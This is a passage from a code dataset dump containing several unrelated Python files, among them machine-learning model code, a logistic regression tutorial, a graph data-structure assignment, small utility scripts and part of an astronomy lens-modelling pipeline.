\"__main__\":\n\tmain()\n\n","sub_path":"appChartServer.py","file_name":"appChartServer.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"494644323","text":"from fetch_tokenizers import PAD_IDX\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass PositionWiseFeedForward(nn.Module):\n def __init__(self, d_model, d_ff, dropout=0.1):\n super(PositionWiseFeedForward, self).__init__()\n self.w_1 = nn.Linear(d_model, d_ff)\n self.w_2 = nn.Linear(d_ff, d_model)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x):\n return self.w_2(self.dropout(F.relu(self.w_1(x))))\n\nclass PositionwiseFeedForward(nn.Module):\n \"Implements FFN equation.\"\n def __init__(self, d_model, d_ff, dropout=0.1):\n super(PositionwiseFeedForward, self).__init__()\n self.w_1 = nn.Linear(d_model, d_ff)\n self.w_2 = nn.Linear(d_ff, d_model)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x):\n return self.w_2(self.dropout(F.relu(self.w_1(x))))\n\nclass Embeddings(nn.Module):\n def __init__(self, d_model, vocab):\n super(Embeddings, self).__init__()\n self.emb = nn.Embedding(vocab, d_model, padding_idx=PAD_IDX)\n self.d_model = d_model\n\n def forward(self, x):\n return self.emb(x.long()) * math.sqrt(self.d_model)\n\nclass PositionalEncoding(nn.Module):\n def __init__(self, d_model, dropout, max_len=5000):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n\n positional_embedding = torch.zeros((max_len, d_model))\n position = torch.arange(0, max_len).reshape(max_len, 1)\n div = torch.exp(torch.arange(0, d_model, 2) * -(math.log(10000) / d_model))\n\n positional_embedding[:, 0::2] = torch.sin(position * div)\n positional_embedding[:, 1::2] = torch.cos(position * div)\n positional_embedding = positional_embedding.unsqueeze(-2)\n\n self.register_buffer('positional_embedding', positional_embedding)\n\n def forward(self, x):\n x = x + self.positional_embedding[:x.size(0),:]\n return self.dropout(x)","sub_path":"model/position.py","file_name":"position.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"559526823","text":"from django.conf.urls import url\n\nimport views\nfrom scnvsim import check_reference_ready\n\napp_name = 'webapp'\n\nurlpatterns = [\n url(r'^$', views.home, name='home'),\n url(r'^simulation$', views.simulation, name='simulation'),\n url(r'^params$', views.params, name='params'),\n]\n\ncheck_reference_ready()","sub_path":"webapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"183329892","text":"#===========================IMPORTING TREQUIRED LIBRARIES AND DATASETS==========================\n\n#===========================importing libraries, modules and packages======================\nimport pandas as pd\nimport pylab as pl\nimport numpy as np\nimport scipy.optimize as opt\nimport matplotlib.pyplot as plt\nimport itertools\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import jaccard_score\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.metrics import log_loss\n# %matplotlib inline #needed in jupyter notebooks\n\n#==================Loading the data into the project=================================\nchurn_df = pd.read_csv(\"ChurnData.csv\")\ndata = churn_df.head()\nprint(data)\n\n\n\n#===================================DATA PREPROCESSING AND SELECTION==================================\n\n#============================================Data selection=====================================\nchurn_df = churn_df[['tenure', 'age', 'address', 'income', 'ed', 'employ', 'equip', 'callcard', 'wireless','churn']]\nchurn_df['churn'] = churn_df['churn'].astype('int')\ndata = churn_df.head()\nprint(data)\n\ndata_shape = churn_df.shape\nprint(data_shape)\n\n#=======================================Features and Target selection===========================\nX = np.asarray(churn_df[['tenure', 'age', 'address', 'income', 'ed', 'employ', 'equip']])\nX[0:5]\nprint(X)\n\ny = np.asarray(churn_df['churn'])\ny [0:5]\nprint(y)\n\n#======================================Normalize dataset===============================\nX = preprocessing.StandardScaler().fit(X).transform(X)\nX[0:5]\nprint(X)\n\n\n\n#==============================================TRAIN/TEST SPLIT========================================\n\nX_train, X_test, y_train, y_test = train_test_split( X, y, test_size=0.2, random_state=4)\nprint ('Train set:', X_train.shape, y_train.shape)\nprint ('Test set:', X_test.shape, y_test.shape)\n\n\n\n#=================================================MODELLING===========================================\n\n#===================================Logistic Regression with SCIKIT-LEARN===============================\nLR = LogisticRegression(C=0.01, solver='liblinear').fit(X_train,y_train)\n #other scikit-learn solvers are ‘newton-cg’, ‘lbfgs’, ‘liblinear’, ‘sag’, ‘saga’ solvers\n #the version of Logistic Regression in Scikit-learn, support regularization. Regularization is a technique used to solve the overfitting problem in machine learning models. C parameter indicates inverse of regularization strength which must be a positive float\nLR\n\n\n\n#============================================PREDICTION=====================================\nyhat = LR.predict(X_test)\nyhat\n\nyhat_prob = LR.predict_proba(X_test)\n #predict_proba returns estimates for all classes, ordered by the label of classes. So, the first column is the probability of class 1, P(Y=1|X), and second column is probability of class 0, P(Y=0|X):\nyhat_prob\nprint(yhat_prob)\n\n\n#============================================EVALUATION========================================\n\n#===========================================Jaccard index========================================\njaccard_similarity_score = jaccard_score(yhat, y_test)\nprint(\"Jacccard Similarity Score: \", jaccard_similarity_score)\n\n\n#=========================================Confusion Matrix======================================\ndef plot_confusion_matrix(cm, classes, normalize = False, title = 'Confusion matrix', cmap = plt.cm.Blues):\n \n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\nprint(confusion_matrix(y_test, yhat, labels=[1,0]))\n\n#=======================plotting the confusion matrix\n# Compute confusion matrix\ncnf_matrix = confusion_matrix(y_test, yhat, labels=[1,0])\nnp.set_printoptions(precision=2)\n\n# Plot non-normalized confusion matrix\nplt.figure()\nplot_confusion_matrix(cnf_matrix, classes=['churn=1','churn=0'],normalize= False, title='Confusion matrix')\n\n#Report result and comparisons\nprint (classification_report(y_test, yhat))\n #Precision is a measure of the accuracy provided that a class label has been predicted. It is defined by: precision = TP / (TP + FP)\n #Recall is true positive rate. It is defined as: Recall = TP / (TP + FN)\n #F1 score reaches its best value at 1 (perfect precision and recall) and worst at 0.\n\n\n#===========================================Log Loss========================================\nlog_loss = log_loss(y_test, yhat_prob)\nprint(log_loss)\n\n\n# #=======================SAMPLE MODEL USING DIFFERENT LOGISTIC REGRESSION PARAMETERS========================\n# LR2 = LogisticRegression(C=0.01, solver='sag').fit(X_train, y_train)\n# yhat_prob2 = LR2.predict_proba(X_test)\n# print (\"LogLoss for sample parameter: %.2f\" % log_loss(y_test, yhat_prob2))\n\n\n","sub_path":"LR.py","file_name":"LR.py","file_ext":"py","file_size_in_byte":5802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"72813381","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport custom_sugartensor as tf\nimport helper_ops\nfrom twitter_data_large import TwitterDataFeeder\n\n# Note: modified from https://github.com/buriburisuri/ByteNet\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"corpus\")\nparser.add_argument(\"datapath\")\nargs = parser.parse_args()\n\n# set log level to debug\ntf.sg_verbosity(10)\n\n\n#\n# hyper parameters\n#\n\nbatch_size = 24 # batch size\nlatent_dim = 800 # hidden layer dimension\ngc_latent_dim = 800 # dimension of conditional embedding\nnum_blocks = 3 # dilated blocks\nuse_conditional_gate = True\nuse_l2_norm = False\nconcat_embedding = True\n\n#\n# inputs\n#\n\nsess = tf.Session(config=tf.ConfigProto(\n intra_op_parallelism_threads=4))\n\n# ComTrans parallel corpus input tensor ( with QueueRunner )\nif args.corpus == \"twitter\":\n data = TwitterDataFeeder(batch_size=batch_size, path = args.datapath, sess = sess)\nelse:\n raise Exception(\"That corpus isn't permitted.\")\n\n# source, target sentence\nx, y, conditionals_x, conditionals_y = data.source, data.target, data.src_cond, data.tgt_cond\n\n\nvoca_size = data.voca_size\n\n#conditional_size = data.cond_size # this is the number of cardinal conditionals, for example if 377 is the highest speaker id\n\n# TODO: this is for conditioning on speaker also\n#emb_conditional = tf.sg_emb(name='emb_cond', voca_size=conditional_size, dim=gc_latent_dim)\n# make embedding matrix for source and target\nemb_x = tf.sg_emb(name='emb_x', voca_size=voca_size, dim=latent_dim)\nemb_y = tf.sg_emb(name='emb_y', voca_size=voca_size, dim=latent_dim)\n\n# shift target for training source\ny_src = tf.concat(axis=1, values=[tf.zeros((batch_size, 1), tf.sg_intx), y[:, :-1]])\n\n# residual block\n@tf.sg_sugar_func\ndef sg_res_block(tensor, opt):\n # default rate\n opt += tf.sg_opt(size=3, rate=1, causal=False, is_first=False)\n\n # input dimension\n in_dim = tensor.get_shape().as_list()[-1]\n\n # reduce dimension\n with tf.sg_context(name='block_%d_%d' % (opt.block, opt.rate)):\n input_ = (tensor\n .sg_bypass(act='relu', ln=(not opt.is_first), name='bypass')\n .sg_conv1d(size=1, dim=in_dim/2, act='relu', ln=True))\n\n # 1xk conv dilated\n if opt.conditional is not None:\n out = input_.sg_aconv1d(size=opt.size, rate=opt.rate, causal=opt.causal, ln=True, name='aconv')\n out1 = out + opt.conditional.sg_conv1d(size=1, stride=1, in_dim=gc_latent_dim, dim=in_dim/2, pad=\"SAME\", bias=False)\n out2 = out + opt.conditional.sg_conv1d(size=1, stride=1, in_dim=gc_latent_dim, dim=in_dim/2, pad=\"SAME\", bias=False)\n out = out1.sg_tanh() * out2.sg_sigmoid()\n else:\n out = input_.sg_aconv1d(size=opt.size, rate=opt.rate, causal=opt.causal, ln=True, name='aconv', act='relu')\n\n # dimension recover and residual connection\n out = out.sg_conv1d(size=1, dim=in_dim, name='conv_out') + tensor\n\n return out\n\n# inject residual multiplicative block\ntf.sg_inject_func(sg_res_block)\n\n\n#\n# encode graph ( atrous convolution )\n#\n\n# embed table lookup\nenc = x.sg_lookup(emb=emb_x)\n# loop dilated conv block\nfor i in range(num_blocks):\n enc = (enc\n .sg_res_block(size=5, block=i, rate=1, is_first=True)\n .sg_res_block(size=5, block=i, rate=2)\n .sg_res_block(size=5, block=i, rate=4)\n .sg_res_block(size=5, block=i, rate=8)\n .sg_res_block(size=5, block=i, rate=16))\n\n\n# concat merge target source\nif concat_embedding:\n dec = enc.sg_concat(target=y_src.sg_lookup(emb=emb_y))\nelse:\n dec = y_src.sg_lookup(emb=emb_y)\n\nif use_conditional_gate:\n in_dim = enc.get_shape().as_list()[-1]\n enc = enc.sg_conv1d(size=1, in_dim=in_dim, dim=gc_latent_dim, act='relu')\nelse:\n enc = None\n\n#\n# decode graph ( causal convolution )\n#\n\n# loop dilated causal conv block\nfor i in range(num_blocks):\n dec = (dec\n .sg_res_block(size=3, rate=1, block=i, causal=True, conditional=enc, is_first=True)\n .sg_res_block(size=3, rate=2,block=i, causal=True, conditional=enc)\n .sg_res_block(size=3, rate=4, block=i, causal=True, conditional=enc)\n .sg_res_block(size=3, rate=8, block=i, causal=True, conditional=enc)\n .sg_res_block(size=3, rate=16, block=i, causal=True, conditional=enc))\n\n# final fully convolution layer for softmax\ndec = dec.sg_conv1d(size=1, dim=data.voca_size, name='conv_final')\n\n# cross entropy loss with logit and mask\nloss = dec.sg_ce(target=y, mask=True)\n\nif use_l2_norm:\n l2_loss = tf.add_n([tf.nn.l1_loss(v) for v in tf.trainable_variables() if '/b:' not in v.name])\n tf.sg_summary_loss(l2_loss, prefix='l2_loss')\n loss += .00001 * l2_loss\n tf.sg_summary_loss(loss, prefix='total_loss')\n\n# train\ndata.launch_data_threads()\n\ntf.sg_init(sess)\n\norig_sources = [\nu\"Hello!\",\nu\"How are you?\",\nu\"What's your name?\",\nu\"When were you born?\",\nu\"What year were you born?\",\nu\"Where are you from?\",\nu\"Are you a man or a woman?\",\nu\"See you later.\",\nu\"Why are we here?\",\nu\"Okay, bye!\",\nu\"My name is David. What is my name?\",\nu\"My name is John. What is my name?\",\nu\"Are you a leader or a follower?\",\nu\"Are you a follower or a leader?\",\nu\"Is sky blue or black?\",\nu\"Does a cat have a tail?\",\nu\"Does a cat have a wing?\",\nu\"Can a cat fly?\",\nu\"How many legs does a cat have?\",\nu\"How many legs does a spider have?\",\nu\"How many legs does a centipede have?\",\nu\"What is the color of the sky?\",\nu\"What is the purpose of life?\",\nu\"What is the purpose of living?\",\nu\"What is the purpose of existence?\",\nu\"Where are you now?\",\nu\"What is the purpose of dying?\",\nu\"What is the purpose of being intelligent?\",\nu\"What is the purpose of emotions?\",\nu\"What is moral?\",\nu\"What is immoral?\",\nu\"What is morality?\",\nu\"What do you think about tesla?\",\nu\"What do you think about bill gates?\",\nu\"What do you think about England?\",\nu\"What is your job?\",\nu\"What do you do?\",\nu\"The sky is quite blue.\",\nu\"The grass is very green.\",\nu\"Aunt Jamima would disapprove.\",\nu\"It's cold outside.\",\nu\"That was really tasty.\",\nu\"Eureka!\",\nu\"I've discovered something awesome.\",\nu\"I'm thirsty.\",\nu\"I'm hungry.\",\nu\"I feel sad.\",\nu\"I feel happy.\",\nu\"They're not nice people.\",\nu\"They're nice people.\"\n]\n\ntf.sg_train(sess=sess, optim='Adam', log_interval=2000, lr=0.00005, loss=loss,\n ep_size=data.num_batch, max_ep=10, early_stop=False, lr_reset=False,\n validation_op = helper_ops.validation_op, val_label=dec, val_batches=data.to_batches([orig_src.lower() for orig_src in orig_sources]), x=x, y_src=y_src, data=data)\n\ndata.cleanup_tensorflow_stuff()\n","sub_path":"custom_training_experiment_test2.py","file_name":"custom_training_experiment_test2.py","file_ext":"py","file_size_in_byte":6575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"492837477","text":"import math\nclass Ulamek():\n def __init__(self, licznik, mianownik):\n self.licznik=licznik\n self.mianownik=mianownik\n def show(self):\n print('Twój ułamek to: {}/{}'.format(self.licznik,self.mianownik))\n def uproszczony(self):\n nwd=math.gcd(self.licznik,self.mianownik)\n licznik=int(self.licznik/nwd)\n mianownik=int(self.mianownik/nwd)\n if licznik!=self.licznik:\n print('Twój ułamek uproszczony to: {}/{}'.format(licznik,mianownik))\nulamek=Ulamek(2,4)\nulamek.show()\nulamek.uproszczony()","sub_path":"06-ClassesAndObjects/zad. 17.py","file_name":"zad. 17.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"323273577","text":"# -*- coding: utf-8 -*-\r\n\r\n''' print a document\r\n'''\r\n\r\nimport argparse\r\nimport pathlib\r\n\r\nimport shutil\r\n\r\nusbPath = '/Volumes/台电酷闪/'\r\nparser = argparse.ArgumentParser(description='Back up documents')\r\nparser.add_argument('-s', action='store', dest='src', metavar='SRC', required=True)\r\nparser.add_argument('-d', action='store', dest='dst', metavar='DST')\r\nparser.add_argument('-i', action='store', dest='ignore', nargs='*', metavar='IGNORE')\r\nparser.add_argument('-u', action='store', dest='usbPath', metavar='USB_PATH', default=usbPath)\r\n\r\n\r\nargs = parser.parse_args()\r\nsrc = pathlib.Path('~', args.src).expenduser()\r\nif args.dst:\r\n dst = pathlib.Path(args.usbPath, args.dst)\r\nelse:\r\n dst = pathlib.Path(args.usbPath, args.src)\r\n\r\nif dst.exists():\r\n shutil.rmtree(dst)\r\n\r\nif args.ignore:\r\n shutil.copytree(src, dst, ignore=shutil.ignore_patterns(*args.ignore))\r\nelse:\r\n shutil.copytree(src, dst)","sub_path":"backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"418245522","text":"\"\"\"\nProgram Name: Assignment #12 Calculating Interest\nProgrammer: Hyun Wook Kim\nDate: 2018.06.29\nDescription:\n단리를 계산하는 프로그램을 작성하라. 원금을 입력 받은 다음 이자를\n퍼센트 단위로 입력받고, 기간을 연단위로 입력 받은 후 원리금\n(원금 + 이자)를 출력하보자.\n원리금 = 원금 * (1 + 연이율 * 기간(연단위))\n\"\"\"\n\nif __name__ == '__main__':\n principal = int(input(\"Enter the principal: \"))\n rate = float(input(\"Enter the rate of interest: \"))\n year = int(input(\"Enter the number of years: \"))\n\n print(\"After %d years at %.1lf%%. the invest will be worth $%d\"\n % (year, rate, principal * (1 + rate * 0.01 * year)))\n","sub_path":"Taco101_Python/Assignment/assignment12.py","file_name":"assignment12.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"77739364","text":"# File: Graph.py\r\n\r\n# Description: different graph functions\r\n\r\n# Student Name: Raymond Li\r\n\r\n# Student UT EID: rll2497 \r\n\r\n# Partner Name: Kevin Huang\r\n\r\n# Partner UT EID: kjh2755\r\n\r\n# Course Name: CS 313E\r\n\r\n# Unique Number: 50205\r\n\r\n# Date Created: 11/24/19\r\n\r\n# Date Last Modified: 11/25/19\r\nclass Stack (object):\r\n def __init__ (self):\r\n self.stack = []\r\n\r\n # add an item to the top of the stack\r\n def push (self, item):\r\n self.stack.append (item)\r\n\r\n # remove an item from the top of the stack\r\n def pop (self):\r\n return self.stack.pop()\r\n\r\n # check the item on the top of the stack\r\n def peek (self):\r\n return self.stack[-1]\r\n\r\n # check if the stack if empty\r\n def is_empty (self):\r\n return (len (self.stack) == 0)\r\n\r\n # return the number of elements in the stack\r\n def size (self):\r\n return (len (self.stack))\r\n\r\nclass Queue (object):\r\n def __init__ (self):\r\n self.queue = []\r\n\r\n # add an item to the end of the queue\r\n def enqueue (self, item):\r\n self.queue.append (item)\r\n\r\n # remove an item from the beginning of the queue\r\n def dequeue (self):\r\n return (self.queue.pop(0))\r\n\r\n # check if the queue is empty\r\n def is_empty (self):\r\n return (len (self.queue) == 0)\r\n\r\n # return the size of the queue\r\n def size (self):\r\n return (len (self.queue))\r\n\r\nclass Vertex(object):\r\n def __init__(self,label):\r\n self.label = label\r\n self.visited = False\r\n\r\n def was_visited(self):\r\n return self.visited\r\n\r\n def get_label(self):\r\n return self.label\r\n\r\n def __str__(self):\r\n return str(self.label)\r\n\r\nclass Graph(object):\r\n def __init__(self):\r\n self.vertices = []\r\n self.adjMat = []\r\n\r\n def has_vertex(self,label):\r\n numVertex = len(self.vertices)\r\n for i in range(numVertex):\r\n if (label == (self.vertices[i]).get_label()):\r\n return True\r\n else:\r\n return False\r\n\r\n def get_index(self,label):\r\n numVertex = len(self.vertices)\r\n for i in range (numVertex):\r\n if (label == (self.vertices[i]).get_label()):\r\n return i\r\n return -1\r\n\r\n def add_vertex(self,label):\r\n if (not self.has_vertex(label)):\r\n self.vertices.append(Vertex(label))\r\n #add column to adjacency matrix\r\n numVertex = len(self.vertices)\r\n for i in range(numVertex-1):\r\n self.adjMat[i].append(0)\r\n #add a new row for the new vertex\r\n new_row = []\r\n for i in range(numVertex):\r\n new_row.append(0)\r\n self.adjMat.append(new_row)\r\n\r\n #add weighted directed edge to graph\r\n def add_directed_edge(self, start, finish, weight = 1):\r\n self.adjMat[start][finish] = weight\r\n\r\n #add weighted undirected edge to graph\r\n def add_undirected_edge(self, start, finish, weight = 1):\r\n self.adjMat[start][finish] = weight\r\n self.adjMat[finish][start] = weight\r\n\r\n #get edge weight between two vertices, return -1 if edge does not exist\r\n def get_edge_weight (self, fromVertexLabel, toVertexLabel):\r\n fromVertex = self.get_index(fromVertexLabel)\r\n toVertex = self.get_index(toVertexLabel)\r\n if (self.adjMat[fromVertex][toVertex] == True):\r\n edgeWeight = self.adjMat[fromVertex][toVertex]\r\n return edgeWeight\r\n else:\r\n return -1\r\n \r\n # get a list of immediate neighbors that you can go to from a vertex\r\n # return empty list if there are none\r\n def get_neighbors (self, vertexLabel):\r\n numVertex = len(self.vertices)\r\n neighbors = []\r\n for i in range(numVertex):\r\n if (self.adjMat[self.get_index(vertexLabel)][i] > 0):\r\n neighbors.append((self.vertices[i].label))\r\n return neighbors\r\n\r\n\r\n #return an unvisited vertex adjacent to vertex v(index)\r\n def get_adj_unvisited_vertex(self, v):\r\n numVertex = len(self.vertices)\r\n for i in range(numVertex):\r\n if (self.adjMat[v][i] > 0) and (not (self.vertices[i]).was_visited()):\r\n return i\r\n return -1 \r\n # get a copy of the list of Vertex objects\r\n def getVertices(self):\r\n vertexCopy = []\r\n numVertex = len(self.vertices)\r\n for i in range(numVertex):\r\n vertexCopy.append((self.vertices[i].label))\r\n return vertexCopy\r\n\r\n # do a depth first search in a graph starting at vertex v (index)\r\n def dfs (self, v):\r\n #create a stack\r\n theStack = Stack()\r\n #mark the vertex v as visited and push it on the Stack\r\n (self.vertices[v]).visited = True\r\n print(self.vertices[v])\r\n theStack.push(v)\r\n\r\n #visit all other vertices according to depth \r\n while (not theStack.is_empty()):\r\n #get and adjacent unvisited vertex\r\n u = self.get_adj_unvisited_vertex(theStack.peek())\r\n if (u == -1):\r\n u = theStack.pop()\r\n else:\r\n (self.vertices[u]).visited = True\r\n print(self.vertices[u])\r\n theStack.push(u)\r\n #the stack is empty, let us reset the flags\r\n numVertex = len(self.vertices)\r\n for i in range(numVertex):\r\n self.vertices[i].visited = False\r\n\r\n #breadth first search\r\n def bfs(self,v):\r\n #create a queue\r\n theQueue = Queue()\r\n #mark the vertex v as visited and enqueue it\r\n self.vertices[v].visited = True\r\n theQueue.enqueue(v)\r\n #go through other vertices\r\n while (theQueue.is_empty() == False):\r\n queueSize = theQueue.size()\r\n for i in range(queueSize):\r\n ans = theQueue.dequeue()\r\n print(self.vertices[ans])\r\n x = self.get_adj_unvisited_vertex(ans)\r\n while (x != -1):\r\n theQueue.enqueue(x)\r\n self.vertices[x].visited = True\r\n x = self.get_adj_unvisited_vertex(ans)\r\n #queue is empty, reset flags\r\n numVertex = len(self.vertices)\r\n for i in range(numVertex):\r\n self.vertices[i].visited = False \r\n return \r\n\r\n # delete an edge from the adjacency matrix\r\n # delete a single edge if the graph is directed\r\n # delete two edges if the graph is undirected\r\n def delete_edge(self, fromVertexLabel, toVertexLabel):\r\n fromVertex = None\r\n toVertex = None\r\n numVertex = len(self.vertices)\r\n for i in range(numVertex):\r\n if self.vertices[i].label == fromVertexLabel:\r\n fromVertex = i\r\n if self.vertices[i].label == toVertexLabel:\r\n toVertex = i\r\n if (fromVertex != None and toVertex != None):\r\n self.adjMat[fromVertex][toVertex] = 0\r\n self.adjMat[toVertex][fromVertex] = 0\r\n \r\n # delete a vertex from the vertex list and all edges from and\r\n # to it in the adjacency matrix\r\n def delete_vertex (self, vertexLabel):\r\n #locate the vertexLabel index\r\n vertexIndex = self.get_index(vertexLabel)\r\n #delete from vertex list\r\n self.vertices.pop(vertexIndex)\r\n #delete from adjacency matrix\r\n del self.adjMat[vertexIndex]\r\n #delete edges\r\n for i in range(len(self.adjMat)):\r\n del self.adjMat[i][vertexIndex]\r\n\r\ndef main():\r\n # create the Graph object\r\n cities = Graph()\r\n\r\n # oepn the file for reading\r\n in_file = open (\"./graph.txt\", \"r\")\r\n\r\n # read the number of vertices\r\n num_vertices = int ((in_file.readline()).strip())\r\n \r\n # read all the Vertices and add them the Graph\r\n for i in range (num_vertices):\r\n city = (in_file.readline()).strip()\r\n cities.add_vertex (city)\r\n\r\n # read the number of edges\r\n num_edges = int ((in_file.readline()).strip())\r\n \r\n # read the edges and add them to the adjacency matrix\r\n for i in range (num_edges):\r\n edge = (in_file.readline()).strip()\r\n edge = edge.split()\r\n start = int (edge[0])\r\n finish = int (edge[1])\r\n weight = int (edge[2])\r\n cities.add_directed_edge (start, finish, weight)\r\n\r\n # read the starting vertex fro dfs and bfs\r\n start_vertex = (in_file.readline()).strip()\r\n #print (start_vertex)\r\n\r\n # get the index of the starting vertex\r\n start_index = cities.get_index (start_vertex)\r\n #print (start_index)\r\n\r\n # do the depth first search\r\n print (\"\\nDepth First Search from \" + start_vertex)\r\n cities.dfs (start_index)\r\n\r\n #do breadth first search in a graph\r\n print(\"\\nBreadth First Search from \" + start_vertex)\r\n cities.bfs(start_index)\r\n\r\n #deletion of an edge\r\n delEdge = in_file.readline().strip()\r\n delEdge = delEdge.split()\r\n #print(delEdge)\r\n print(\"\\nDeletion of an edge\")\r\n cities.delete_edge(delEdge[0],delEdge[1])\r\n\r\n # print the adjacency matrix\r\n print (\"\\nAdjacency Matrix\")\r\n for i in range (num_vertices):\r\n for j in range (num_vertices):\r\n print (cities.adjMat[i][j], end = \" \")\r\n print ()\r\n print ()\r\n\r\n #deletion of a vertex\r\n print(\"Deletion of a vertex\")\r\n delVertex = in_file.readline().strip()\r\n delVertex = delVertex.split()\r\n #print(delVertex)\r\n cities.delete_vertex(delVertex[0])\r\n\r\n #print the vertices (cities)\r\n print(\"\\nList of Vertices\")\r\n for i in cities.vertices:\r\n print(i)\r\n \r\n # print the adjacency matrix\r\n print (\"\\nAdjacency Matrix\")\r\n for i in range (num_vertices-1):\r\n for j in range (num_vertices-1):\r\n print (cities.adjMat[i][j], end = \" \")\r\n print ()\r\n print ()\r\n\r\n #close file\r\n in_file.close()\r\n\r\nmain() \r\n ","sub_path":"Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":9868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"115374229","text":"import autofit as af\nimport autogalaxy as ag\nfrom autoconf import conf\nfrom autolens.pipeline import setup\n\n\nclass SLaM:\n def __init__(self, folders=None, hyper=None, source=None, light=None, mass=None):\n\n self.folders = folders\n self.hyper = hyper\n self.source = source\n self.light = light\n self.mass = mass\n self.mass.disk_as_sersic = self.light.disk_as_sersic\n\n def set_source_type(self, source_type):\n\n self.source.type_tag = source_type\n\n def set_light_type(self, light_type):\n\n self.light.type_tag = light_type\n\n def set_mass_type(self, mass_type):\n\n self.mass.type_tag = mass_type\n\n @property\n def source_pipeline_tag(self):\n return conf.instance.tag.get(\"pipeline\", \"pipeline\", str) + self.hyper.hyper_tag\n\n @property\n def lens_light_tag_for_source_pipeline(self):\n \"\"\"Return the lens light tag in a *Source* pipeline, where the lens light is set depending on the source\n initialize pipeline that was used.\"\"\"\n\n if self.light.type_tag is None:\n return \"\"\n\n light_tag = conf.instance.tag.get(\"pipeline\", \"light\", str)\n return \"__\" + light_tag + \"_\" + self.light.type_tag\n\n def lens_from_light_pipeline_for_mass_pipeline(self, redshift_lens, mass, shear):\n \"\"\"Setup the lens model for a Mass pipeline using the previous pipeline and phase results.\n\n The lens light model is not specified by the Mass pipeline, so the Light pipelines are used to\n determine this. This function returns a _GalaxyModel_ for the lens, where:\n\n 1) The lens light model uses the light model of the Light pipeline.\n 2) The lens light is returned as a model if *fix_lens_light* is *False, an instance if *True*.\n\n Parameters\n ----------\n redshift_lens : float\n The redshift of the lens galaxy.\n mass : ag.MassProfile\n The mass model of the len galaxy.\n shear : ag.ExternalShear\n The external shear of the lens galaxy.\n \"\"\"\n\n if self.mass.fix_lens_light:\n\n return ag.GalaxyModel(\n redshift=redshift_lens,\n bulge=af.last.instance.galaxies.lens.bulge,\n disk=af.last.instance.galaxies.lens.disk,\n mass=mass,\n shear=shear,\n hyper_galaxy=af.last.hyper_combined.instance.optional.galaxies.lens.hyper_galaxy,\n )\n\n else:\n\n return ag.GalaxyModel(\n redshift=redshift_lens,\n bulge=af.last.model.galaxies.lens.bulge,\n disk=af.last.model.galaxies.lens.disk,\n mass=mass,\n shear=shear,\n hyper_galaxy=af.last.hyper_combined.instance.optional.galaxies.lens.hyper_galaxy,\n )\n\n def source_from_source_pipeline_for_light_pipeline(self):\n \"\"\"Setup the source model for a Light pipeline using the previous pipeline and phase results.\n\n The source light model is not specified by the Light pipeline, so the Source pipelines are used to \n determine whether the source model is parametric or an inversion. This behaviour can be customized in SLaM \n pipelines by replacing this method with the *source_from_previous_pipeline_model_or_instance* method of the \n SLaM class.\n \n The source is returned as an instance for the Light pipeline, irrespective of whether it is parametric or an\n Inversion. This is because this phase fits the lens light, and thus does not depend strongly on the source.\n \"\"\"\n return self.source_from_previous_pipeline_model_or_instance(\n source_as_model=False, index=0\n )\n\n def source_from_source_pipeline_for_mass_pipeline(self):\n \"\"\"Setup the source model for a Mass pipeline using the previous pipeline and phase results.\n\n The source light model is not specified by the pipeline Mass pipeline (e.g. the previous pipelines are used to \n determine whether the source model is parametric or an inversion.\n\n The source is returned as a model if it is parametric (given it must be updated to properly compute a new mass\n model) whereas inversions are returned as an instance (as they have sufficient flexibility to typically not\n required updating). This behaviour can be customized in SLaM pipelines by replacing this method with the\n *source_from_previous_pipeline_model_or_instance* method of the SLaM class.\n \"\"\"\n if self.source.type_tag in \"sersic\":\n return self.source_from_previous_pipeline_model_or_instance(\n source_as_model=True, index=0\n )\n else:\n return self.source_from_previous_pipeline_model_or_instance(\n source_as_model=False, index=0\n )\n\n def source_from_previous_pipeline_model_or_instance(\n self, source_as_model=False, index=0\n ):\n \"\"\"Setup the source model using the previous pipeline and phase results.\n\n The source light model is not specified by the pipeline light 